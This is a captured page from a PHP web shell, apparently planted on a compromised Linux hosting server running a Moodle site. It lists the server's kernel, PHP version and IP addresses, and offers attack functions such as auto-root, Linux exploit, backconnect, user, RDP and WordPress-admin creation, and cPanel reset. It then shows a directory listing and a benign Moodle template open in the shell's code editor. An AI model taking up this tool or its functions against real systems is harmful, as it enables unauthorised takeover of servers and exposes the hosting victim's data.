Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.27
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
stash /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
drop_image.mustache
1.8
KB
-rw-r--r--
drop_snippet_dialogue.mustache
1.27
KB
-rw-r--r--
drop_snippet_ui.mustache
3.27
KB
-rw-r--r--
drop_text.mustache
1.31
KB
-rw-r--r--
fullpage_help.mustache
869
B
-rw-r--r--
item.mustache
928
B
-rw-r--r--
item_detail.mustache
1.03
KB
-rw-r--r--
item_select_dialogue.mustache
1.72
KB
-rw-r--r--
item_small.mustache
1.05
KB
-rw-r--r--
item_xsmall.mustache
940
B
-rw-r--r--
main_content.mustache
1.76
KB
-rw-r--r--
profile_content.mustache
1.16
KB
-rw-r--r--
trade.mustache
2.82
KB
-rw-r--r--
trade_add_item_detail.mustache
1.22
KB
-rw-r--r--
trade_form.mustache
7.2
KB
-rw-r--r--
trade_item_picker.mustache
3.03
KB
-rw-r--r--
trade_loss_item_detail.mustach...
1.17
KB
-rw-r--r--
trade_snippet_dialogue.mustach...
4.18
KB
-rw-r--r--
trade_success.mustache
781
B
-rw-r--r--
tradeitem_detail.mustache
985
B
-rw-r--r--
user_item.mustache
1.17
KB
-rw-r--r--
user_item_reset.mustache
2.71
KB
-rw-r--r--
user_item_small.mustache
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user_item_reset.mustache
{{! This file is part of Moodle - http://moodle.org/ Moodle is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Moodle is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with Moodle. If not, see <http://www.gnu.org/licenses/>. }} {{! User item reset. Used to reset individual items in a user's stash. }} <button class="btn btn-secondary pull-right mb-1" data-additem data-courseid="{{courseid}}" data-userid="{{userid}}" data-sesskey="{{sesskey}}">Add item</button> <table class="table table-striped" > {{#userstash}} <tr> {{#item}} <form action="item_reset.php" method="POST"> <td scope="col"> {{>block_stash/user_item}} {{item.name}} </td> <td> <input type="number" name="quantity" value="{{useritem.quantity}}" min="1" size="5"></input> <input type="hidden" name="courseid" value="{{courseid}}" /> <input type="hidden" name="userid" value="{{userid}}" /> <input type="hidden" name="itemid" value="{{item.id}}" /> <input type="hidden" name="sesskey" value="{{sesskey}}" /> </td> <td scope="col"> <button class="btn btn-secondary" type="submit">{{#pix}}e/save, core, {{#str}}savequantity, block_stash, {{item.name}} {{/str}}{{/pix}}</button> <a href="item_reset.php?itemid={{item.id}}&userid={{useritem.userid}}&courseid={{courseid}}&sesskey={{sesskey}}" class="btn btn-secondary">{{#pix}}t/delete, core, {{#str}}deleteuseritem, block_stash, {{item.name}} {{/str}}{{/pix}}</a> </td> </form> {{/item}} </tr> {{/userstash}} </table> {{#js}} require([ 'jquery', 'block_stash/item-selector-dialogue' ], function($, ItemSelect) { $("[data-additem]").click(function(e) { var targetnode = e.currentTarget; var userid = e.currentTarget.getAttribute('data-userid'); var courseid = e.currentTarget.getAttribute('data-courseid'); var sesskey = e.currentTarget.getAttribute('data-sesskey'); var dialogue = new ItemSelect(userid, courseid, sesskey, ''); dialogue.show(e); }); }); {{/js}}
Close